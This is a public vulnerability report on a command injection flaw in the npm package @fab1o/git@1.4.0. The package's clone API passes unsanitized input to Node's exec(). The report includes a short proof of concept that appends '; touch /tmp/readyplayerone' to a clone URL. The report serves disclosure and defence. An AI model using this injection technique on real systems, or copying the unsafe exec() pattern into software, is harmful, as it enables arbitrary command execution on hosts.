
Command Injection vulnerability in `@fab1o/git@1.4.0`

A Command Injection vulnerability in the `@fab1o/git` npm package allows attackers to execute arbitrary commands on the host system via unsanitized user input passed to the `exec()` function.

This write-up is a public report of the Command Injection vulnerability in @fab1o/git@1.4.0 which I reported to the maintainer yet received no response.

The @fab1o/git npm library describes itself as a wrapper for command line git with promises.

Resources:

Background on exploitation

I’m reporting a Command Injection vulnerability in the @fab1o/git npm package.

The vulnerability lives in the library’s clone API: it accepts user input as the remote URL to clone, concatenates that string into a git command line, and passes the resulting string to the unsafe exec() Node.js child process API, which runs it through a shell.

It should be noted that other methods exposed as user-facing APIs are also vulnerable in the same way.

Exploit

  1. Install @fab1o/git@1.4.0 or earlier
  2. Establish the following POC:

```js
const { Git } = require("@fab1o/git");
var git = new Git();
git
  .clone(
    "https://github.com/sayden/git-command-line.git; touch /tmp/readyplayerone"
  )
  .then(function (res) {
    console.log(res);
  })
  .catch(function (err) {
    console.error(err);
  });
```

  3. Observe the new file created on disk at /tmp/readyplayerone
